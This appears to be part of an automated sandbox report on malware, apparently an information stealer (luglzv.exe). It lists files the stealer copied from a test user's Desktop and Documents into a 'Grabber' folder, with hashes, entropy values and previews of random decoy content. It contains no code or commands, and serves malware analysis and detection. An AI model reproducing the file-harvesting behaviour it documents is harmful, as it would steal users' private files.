RCLWITZRVFLDSOIFRMJCCQXYLT

                                                                  C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Desktop\VLZDGUKUTZ.xlsx

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.701757898321461
                                                                  Encrypted:false
                                                                  SSDEEP:24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
                                                                  MD5:520219000D5681B63804A2D138617B27
                                                                  SHA1:2C7827C354FD7A58FB662266B7E3008AFB42C567
                                                                  SHA-256:C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
                                                                  SHA-512:C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
                                                                  Malicious:false
                                                                  Preview:VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

                                                                  C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Desktop\VLZDGUKUTZ\DVWHKMNFNN.pdf

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.694985340190863
                                                                  Encrypted:false
                                                                  SSDEEP:24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
                                                                  MD5:C9386BC43BF8FA274422EB8AC6BAE1A9
                                                                  SHA1:2CBDE59ADA19F0389A4C482667EC370D68F51049
                                                                  SHA-256:F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
                                                                  SHA-512:7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
                                                                  Malicious:false
                                                                  Preview:DVWHKMNFNNSXRPFRFSVVCQPXSKWHKPJJHYQWYYFONAJQSCOHZADBHUOWOSPDVAOIQVOBHGMIENZQZLABYDKWXGSUQNSEINIQSVMZZWTJLYMGYBQHIJSUWZKJPGBZUGFOXNAMLQTVGWDCYDMNHGVRTUWNHIWXJNQONTAXVVVCFDLWYDVWNMKHRFTZAVEQPXZHSEXPEHWUHPJZDMDXPYEJBYWZOQETVPLRKQRCYTAXMNRBOUJSCYZOUPOBJUWFDMUYFBXCBLZHFHONIURELJQVLWAJRIQCHHASBUAREPSIMJIZDUKJCHMMSSWSEDFHFQOUVYZORWJIUACXUVQKUMLXTQIKDBVNZOHJYYECOBYPNRILKERBHKZPVUSQLHAQRTPWCRMZADYONIIOVUWOBVHAUGZVAGTZTZBMHSOOQORENTXCJFMVWMGLOOXBDWANXXJQQTBDTWOSPFMFVQKLNTSHOPQMHYRYZMWDXVFGWFOSCSFMKCDDHTOQHBTQAFQTXPUHHEAKYRCQIODCCSHRSAJQEFRHCQLQVVMUHWOHHQJPSHCNKRLIRESUXLZIYSWDHHYZVRKLAGFLVTEJQHEEMVUUEQKQMTBDXFGSROZTNPLCVTEEZGUUCQUEKNMQFATATJRARXQQMZYEVACDAXILYPEHYTJOQWSFAJEGHIDIXMKDXPATNSATPECIMRBZNBXXVMGPLMVEKCUOXJWFGQSTWPMTEMRCYGXECVTNKYROYRYTPRDPCFGGKUUBXXSDFZEJCQRIRFLCNMPMLIGUCYPHMWYVAIPAAPHTQAYFSJWLSCZICIXZHXNKAKRHJVENGZTUTVWSNYDDYMWQHHAITLUZXNORBLYTBVCEBWBMSVZXNZMKYFPRFPLFCUSJUWNKQJIZRVZASPVFSUSBYQZZWKEORBDDRCYRBTIMTLHDTZRQUKYJIWHXVJYPEZSDLWZVPZGEYQPCSGGVJXXBUCNBXKQPZTMTVPZUETYYLRJEDWIHAZMS

                                                                  C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Desktop\VLZDGUKUTZ\KATAXZVCPS.xlsx

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.699548026888946
                                                                  Encrypted:false
                                                                  SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                  MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                  SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                  SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                  SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                  Malicious:true
                                                                  Preview:KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

                                                                  C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Desktop\VLZDGUKUTZ\NWTVCDUMOB.jpg

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.696250160603532
                                                                  Encrypted:false
                                                                  SSDEEP:24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
                                                                  MD5:2B6A90B7D410E3A4E2B32C90D816B4FE
                                                                  SHA1:B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
                                                                  SHA-256:D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
                                                                  SHA-512:03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
                                                                  Malicious:true
                                                                  Preview:NWTVCDUMOBTPRQQPHXQLIMGPJXTEMPBNYLBFKQFUEVGISJSVQRMPMZSAYEYQSOTUAJFILXLTKFEVHLSAMYEEFLNJSHLTTFXRTDNUGXEFIGVCAWPMDNUICDIZGPHMESKWSMUPNOFEVXFTSHSKLCVHQTNKDHDMDRJOUTEUSCAUAVMVBMOSYKKRPPZYFUGXFXWMWRACKFCQOUHITLUCHGFZEOIPNCJFJOVBZIKDRNERXOSPKSRMHKTJUGFEOONFWLVNTJWXUFPADWYIUDKAZQXCZRFPUQQAMRTIOEHUDTLGOWYMIDOZAXTLGVEGUCQLJZGMIEQYOLWEMSGZUBWXOIBQEMQLQVGRBTUICFCEJGFTZRZCKJQEMATEONIMJKBYGQYDYXOLLROWXGYCNCVPTMRZSMMSZXKMNPSCJJJKKNRAJXGSLZNKJRJRGMCCCBCIGTLTFKNVDVIHYLGRNXDVIVWBCPNKNIFJAPQQWDQQEDDKNHVJRQJTKCUADORWREEDYTVFAOWHPNXWSNAJCVXCLLTNQPMJQHDILFNQUZJZZJJMMNDNGEBEGSTVAGZJMSMZHWJKNIAFGBUYMVADKCVLDGFQETUZXGUOUWXBBPNOWFERKMKMPOXIOTKJERPVXJGCIUKAGDGITLFYRIBAPKRESMNOMTVTZCXMODUUIGFMEMBMGAGXFZGAAZFCXDWBKKCPUKFFNMVKDFFVZYWKEKBWMADWDZXUIOOLCLIACESGRBJRSMXKUSOKXJEICCPRFWSISDTKVTDVAYSWLRHTWJGCXQMNITQJHCBMSCDRWKMGADWILLATOPVPILEQQGAIPRRUCJFTRRSSWITQKIWJOATZOBETZDBBWAIJIOXCUQSILQHQKEZXWFWWNVEWKZCGFYPBDSDBSFAZDZFRHJBZIGOZCVUGODUTNCDHKKMFHSYKUSFSXOMOUXZYOSUZNJQBXAVPOBTVBINMSIPYONLYRKIHONKWHSUAJWIALOTZAQJSNTIH

                                                                  C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Desktop\VLZDGUKUTZ\VLZDGUKUTZ.docx

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.701757898321461
                                                                  Encrypted:false
                                                                  SSDEEP:24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
                                                                  MD5:520219000D5681B63804A2D138617B27
                                                                  SHA1:2C7827C354FD7A58FB662266B7E3008AFB42C567
                                                                  SHA-256:C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
                                                                  SHA-512:C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
                                                                  Malicious:false
                                                                  Preview:VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

                                                                  C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Desktop\VLZDGUKUTZ\YPSIACHYXW.png

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.700014595314478
                                                                  Encrypted:false
                                                                  SSDEEP:24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
                                                                  MD5:960373CA97DEDBA8576ECF40D0D1E39D
                                                                  SHA1:E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
                                                                  SHA-256:501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
                                                                  SHA-512:93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
                                                                  Malicious:false
                                                                  Preview:YPSIACHYXWDOAOALJCJYYKHKMGYIZBYLJSULATZCLAKGTHKIZZZPZMBAJFNQKRWGKHDEEYLGCRMYXVOJCXPRDOFVVXDFSZNRLGLUNBQSCSVJXKHLUFNOKRCASVQNUJDYWNWTNGJYBIKCERFIRWTZVUUNKNCMUGKTMSRIVLFQTZDVSHZTYRURNPZRSHICVPPIWUNOSYRCNVXHOFETKZDTIEIOQHCHWHDXEDXBZFSWIFFLXTXQXUBJCTQSDGVAMQKTUHJAAEDEECWFOEDCAALGNKEQRGJPVEEVJPTSROUZFPHKPUHLAYRHVULFESXXGKSAIYLAVSWMISSCMRGVQGXFGFYXBQBRZHILLZQUJRQJHUVBFDBPCNUAKOXURUUUKQNRUEAXAAXWIVATBILRXVUBDTFNWUQLPZELETXDQPCWJXRRAQILAVVZFAMGUWUYYORCQNUYLSNLTNXIAWJVDTPNCZPHSWYWWTBBJECMEGHRCATJANBKSCMLVOBOTXPKGMTOJISGOTUUOFVJPAGNMHFSAFRHQUHMYURLAJVNZPEMNMUDZAUMRZHQJBWVCUSQAENWUTRFBUFUWIPJYVLYDUIBJSTTFGSFBHTKIXJNVJUYJGSHZHMDONOHBMLQDTHGTPLYVKGUXWHEYTHTWOOMQOGUFQGRWUYBVWILTRHBAIJHZKXNAQYAIZBPYWWZSBDWNPRWGFXHNPFFMHKCCERIWCTACKIVXLZBNOTBYDOPJBYTZWNSXYXVYPHAGUHBXKPPAFNZGWEKOBPXTCLBIOEIVWLELPXJAINCDBEUOIFMNFWSRDONSGUCNGDZLIAFVNUQXZMTVJLIACGEXXESAGRKCPJNTKZHMMCTJZCLWNTNEJFUCODLVBCJHINWJYBLRXSKLVKNYGPLXGKEHMXSDKIAPHRGHBOCHQEJPMJEKRMRTLJNYNRHDPPQKJHXGYJMDUOESMBVJOBKJWUUSSZEQAGHANSYFBHIZFXSLENBLJWCHGEM

                                                                  C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Desktop\YPSIACHYXW.pdf

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.700014595314478
                                                                  Encrypted:false
                                                                  SSDEEP:24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
                                                                  MD5:960373CA97DEDBA8576ECF40D0D1E39D
                                                                  SHA1:E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
                                                                  SHA-256:501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
                                                                  SHA-512:93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
                                                                  Malicious:false
                                                                  Preview:YPSIACHYXWDOAOALJCJYYKHKMGYIZBYLJSULATZCLAKGTHKIZZZPZMBAJFNQKRWGKHDEEYLGCRMYXVOJCXPRDOFVVXDFSZNRLGLUNBQSCSVJXKHLUFNOKRCASVQNUJDYWNWTNGJYBIKCERFIRWTZVUUNKNCMUGKTMSRIVLFQTZDVSHZTYRURNPZRSHICVPPIWUNOSYRCNVXHOFETKZDTIEIOQHCHWHDXEDXBZFSWIFFLXTXQXUBJCTQSDGVAMQKTUHJAAEDEECWFOEDCAALGNKEQRGJPVEEVJPTSROUZFPHKPUHLAYRHVULFESXXGKSAIYLAVSWMISSCMRGVQGXFGFYXBQBRZHILLZQUJRQJHUVBFDBPCNUAKOXURUUUKQNRUEAXAAXWIVATBILRXVUBDTFNWUQLPZELETXDQPCWJXRRAQILAVVZFAMGUWUYYORCQNUYLSNLTNXIAWJVDTPNCZPHSWYWWTBBJECMEGHRCATJANBKSCMLVOBOTXPKGMTOJISGOTUUOFVJPAGNMHFSAFRHQUHMYURLAJVNZPEMNMUDZAUMRZHQJBWVCUSQAENWUTRFBUFUWIPJYVLYDUIBJSTTFGSFBHTKIXJNVJUYJGSHZHMDONOHBMLQDTHGTPLYVKGUXWHEYTHTWOOMQOGUFQGRWUYBVWILTRHBAIJHZKXNAQYAIZBPYWWZSBDWNPRWGFXHNPFFMHKCCERIWCTACKIVXLZBNOTBYDOPJBYTZWNSXYXVYPHAGUHBXKPPAFNZGWEKOBPXTCLBIOEIVWLELPXJAINCDBEUOIFMNFWSRDONSGUCNGDZLIAFVNUQXZMTVJLIACGEXXESAGRKCPJNTKZHMMCTJZCLWNTNEJFUCODLVBCJHINWJYBLRXSKLVKNYGPLXGKEHMXSDKIAPHRGHBOCHQEJPMJEKRMRTLJNYNRHDPPQKJHXGYJMDUOESMBVJOBKJWUUSSZEQAGHANSYFBHIZFXSLENBLJWCHGEM

                                                                  C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Desktop\YPSIACHYXW.png

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.700014595314478
                                                                  Encrypted:false
                                                                  SSDEEP:24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
                                                                  MD5:960373CA97DEDBA8576ECF40D0D1E39D
                                                                  SHA1:E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
                                                                  SHA-256:501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
                                                                  SHA-512:93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
                                                                  Malicious:false
                                                                  Preview:YPSIACHYXWDOAOALJCJYYKHKMGYIZBYLJSULATZCLAKGTHKIZZZPZMBAJFNQKRWGKHDEEYLGCRMYXVOJCXPRDOFVVXDFSZNRLGLUNBQSCSVJXKHLUFNOKRCASVQNUJDYWNWTNGJYBIKCERFIRWTZVUUNKNCMUGKTMSRIVLFQTZDVSHZTYRURNPZRSHICVPPIWUNOSYRCNVXHOFETKZDTIEIOQHCHWHDXEDXBZFSWIFFLXTXQXUBJCTQSDGVAMQKTUHJAAEDEECWFOEDCAALGNKEQRGJPVEEVJPTSROUZFPHKPUHLAYRHVULFESXXGKSAIYLAVSWMISSCMRGVQGXFGFYXBQBRZHILLZQUJRQJHUVBFDBPCNUAKOXURUUUKQNRUEAXAAXWIVATBILRXVUBDTFNWUQLPZELETXDQPCWJXRRAQILAVVZFAMGUWUYYORCQNUYLSNLTNXIAWJVDTPNCZPHSWYWWTBBJECMEGHRCATJANBKSCMLVOBOTXPKGMTOJISGOTUUOFVJPAGNMHFSAFRHQUHMYURLAJVNZPEMNMUDZAUMRZHQJBWVCUSQAENWUTRFBUFUWIPJYVLYDUIBJSTTFGSFBHTKIXJNVJUYJGSHZHMDONOHBMLQDTHGTPLYVKGUXWHEYTHTWOOMQOGUFQGRWUYBVWILTRHBAIJHZKXNAQYAIZBPYWWZSBDWNPRWGFXHNPFFMHKCCERIWCTACKIVXLZBNOTBYDOPJBYTZWNSXYXVYPHAGUHBXKPPAFNZGWEKOBPXTCLBIOEIVWLELPXJAINCDBEUOIFMNFWSRDONSGUCNGDZLIAFVNUQXZMTVJLIACGEXXESAGRKCPJNTKZHMMCTJZCLWNTNEJFUCODLVBCJHINWJYBLRXSKLVKNYGPLXGKEHMXSDKIAPHRGHBOCHQEJPMJEKRMRTLJNYNRHDPPQKJHXGYJMDUOESMBVJOBKJWUUSSZEQAGHANSYFBHIZFXSLENBLJWCHGEM

                                                                  C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Desktop\ZBEDCJPBEY.jpg

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.6994061563025005
                                                                  Encrypted:false
                                                                  SSDEEP:24:B08PKUcagX20VoXE+FZx/9wb8CokRMdpcUuDdgyzat15b9DZd7:B00KZagXRVyEC/9wbtor+DstLbXR
                                                                  MD5:A2EF8D31A8DC8EAFB642142CAE0BDDE5
                                                                  SHA1:6D33FA6AE5C8F3D94A889AF2AFBE701A8939BD4A
                                                                  SHA-256:A63D52B4D40DE4D08B155AB05F7B239F6B826D2E9AEF65D14C536CC17B117180
                                                                  SHA-512:0183DCD7C9808191B0D67319318EDB8069F15943CD9AFFDD5D905CA66471A301A3745EC2BDA93FD30400A08856F9530F8DB8A91555E910534E43591DE6588680
                                                                  Malicious:false
                                                                  Preview:ZBEDCJPBEYDZQGCVTGMBDASCMXWLERZBJTKXMSCERSGFDONQAMYGDFYKFYLRRNDSSGOWCSVJIWIVRJNDSQXJTTMAXVCSRDVBHJTJAHTUGCUAWHWEVTZMXBFFYFUVEYDCLBXZZXFGQTWOJCECEYXZGEOOJDMVGMJIBYUFGTAXZQFDALIISPEXNBMVCNQHJOUZVXMSFGVMMJSOTYBAIBARXRQIHGTHEJLHLQYVFLCLOFZPJJNGWGUFEFWDITXPCXBOEGYNGVEMPRSJBIUABRWYDIZIOEKFMGKERRXNEAUHHIGKJGZYYHOPIKNRRYEAZLMNYDGFIVIJPYMXKETIZCKXHUZFXIJHQQDRCSLMJZZJXMQYZJYWLCENOBYZRKIPDNTOCZBITNJXYFHPKLDLFNFTFPITPPGJYNAUOBLGWYVHPFDVDMRFKRTPDBLSNIHQBPMARNFKQAQJVIEOLDVNQKQXMHUIECHHCBWWKMSQPKKMTKTWVWEBVUAXWNLNMYEUBMGCGJTOJRQFGGHHLUDCSUNVREFGQLVZNTOMRGHSGVZCIEDGKHHTKATGJQYWMOXACOPMCHXJXNTBTSGCPUUSQVNCDVHCIQKUJWVUTGDNGWDNLQEWLMNYLKNVSFDBBIZZEHCDIMOJGCOBQZDWJNJPIEFNVWHFQSCSHGUQLBIQCMTBTOMPFZRCNWPIJILMFSCYXDRTMSMAVJZZGQJTZZACHQUIBTKCMOKJBPDOKJYCHADHETFJAVZAQIIWZRRGFSBGIIPYXFQSZKQPWXQCYERZGATQXEDAHDYBYZVROOBTIZFDOMRDVIUBHXTQOKCVSRLAYYMSBYFDGLRDCLXUKSNRGYDRFKSMAJGRBMDZLACAAKDZLPQZCVGELWTWVKPXDEMWCSQNQCJWQNLMOGJVDBANJWFKRRBFXUWVSMZLFJYCUJJORXEFPORKQLYKBMUOVWZKWNAHBCKBBJIYVVDQNIPFQZUTPFKYIRDTGOBWONUYXDVC

                                                                  C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Desktop\desktop.ini

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):282
                                                                  Entropy (8bit):3.514693737970008
                                                                  Encrypted:false
                                                                  SSDEEP:6:QyqRsioTA5wmHOlRaQmZWGokJqAMhAlWygDAlLwkAl2FlRaQmZWGokJISlfY:QZsiL5wmHOlDmo0qmWvclLwr2FlDmo0I
                                                                  MD5:9E36CC3537EE9EE1E3B10FA4E761045B
                                                                  SHA1:7726F55012E1E26CC762C9982E7C6C54CA7BB303
                                                                  SHA-256:4B9D687AC625690FD026ED4B236DAD1CAC90EF69E7AD256CC42766A065B50026
                                                                  SHA-512:5F92493C533D3ADD10B4CE2A364624817EBD10E32DAA45EE16593E913073602DB5E339430A3F7D2C44ABF250E96CA4E679F1F09F8CA807D58A47CF3D5C9C3790
                                                                  Malicious:false
                                                                  Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.8.3.....

                                                                  C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Documents\DVWHKMNFNN.pdf

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.694985340190863
                                                                  Encrypted:false
                                                                  SSDEEP:24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
                                                                  MD5:C9386BC43BF8FA274422EB8AC6BAE1A9
